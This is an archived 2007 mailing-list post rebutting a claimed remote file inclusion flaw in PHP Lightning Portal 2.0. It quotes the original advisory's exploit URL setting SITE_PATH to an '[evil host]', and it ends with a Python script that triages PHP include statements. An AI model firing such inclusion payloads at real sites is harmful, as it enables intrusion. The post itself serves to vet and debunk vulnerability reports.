[VIM] FALSE: PHP LIGHTNING PORTAL (PLP) v.2.0 Remote File Inclusion

str0ke str0ke at milw0rm.com
Fri Feb 2 12:04:01 EST 2007


define('SITE_PATH','/var/www/htdocs/'); //with trailing "/"

require SITE_PATH.'inc/lib.inc.php';

Enough said.

/str0ke

* Portal Name = PHP LIGHTNING PORTAL (PLP) v.2.0
* Class = Remote File Inclusion
* Risk = High
* Download = http://www.alarit.com/downloads/products/plp_2_0_demo.zip
**********************************************************************************
- Exploit:
http://www.site.com/[script path]/inc/application.php?SITE_PATH=[evil host]
***********************************************************************************
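The reply's point, that a path built from a define()'d constant cannot be set by a request parameter, written as a small triage check. This is an added example, not code from the original post or from PLP: the function name, verdict labels and the second sample are constructed for illustration, and the regex matching is a simplification that does not handle PHP comments or constants defined in other files.

```python
import re

DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*(['"]).*?\2\s*\)""")
INCLUDE_RE = re.compile(r"\b(?:require|include)(?:_once)?\b\s*\(?\s*([^;]+);")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)")
STRING_RE = re.compile(r"'[^']*'|\"[^\"]*\"")

# The two lines quoted in the reply above.
PAGE_SNIPPET = """define('SITE_PATH','/var/www/htdocs/'); //with trailing "/"

require SITE_PATH.'inc/lib.inc.php';
"""
# Constructed contrast case: same include, but through a $variable.
CONSTRUCTED_VARIANT = "<?php\nrequire $SITE_PATH.'inc/lib.inc.php';\n"


def triage_includes(php_source):
    """Classify each include/require by what its path operand is built from."""
    findings = []
    for inc in INCLUDE_RE.finditer(php_source):
        before = php_source[:inc.start()]
        # Constants defined from a string literal earlier in the file.
        constants = {d.group(1) for d in DEFINE_RE.finditer(before)}
        assigned = {a.group(1) for a in ASSIGN_RE.finditer(before)}
        expr = inc.group(1).strip()
        variables = re.findall(r"\$(\w+)", expr)
        no_strings = re.sub(r"\$\w+", "", STRING_RE.sub("", expr))
        bare_names = re.findall(r"[A-Za-z_]\w*", no_strings)
        if any(v not in assigned for v in variables):
            # Never assigned before use: request-settable if register_globals
            # is on (an assumption about the deployment, not stated in the post).
            verdict = "variable-unassigned"
        elif variables:
            verdict = "variable-assigned"   # trace the assignment by hand
        elif all(name in constants for name in bare_names):
            # Constants are not populated from GET/POST/cookies, so
            # ?SITE_PATH=... has no effect on this path.
            verdict = "constant"
        else:
            verdict = "unknown-constant"    # defined elsewhere, or not at all
        findings.append((expr, verdict))
    return findings


if __name__ == "__main__":
    for label, src in (("post", PAGE_SNIPPET), ("constructed", CONSTRUCTED_VARIANT)):
        print(label, triage_includes(src))
```

A "constant" verdict is grounds to reject an inclusion report like the one quoted above; any other verdict means the include still needs manual review.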

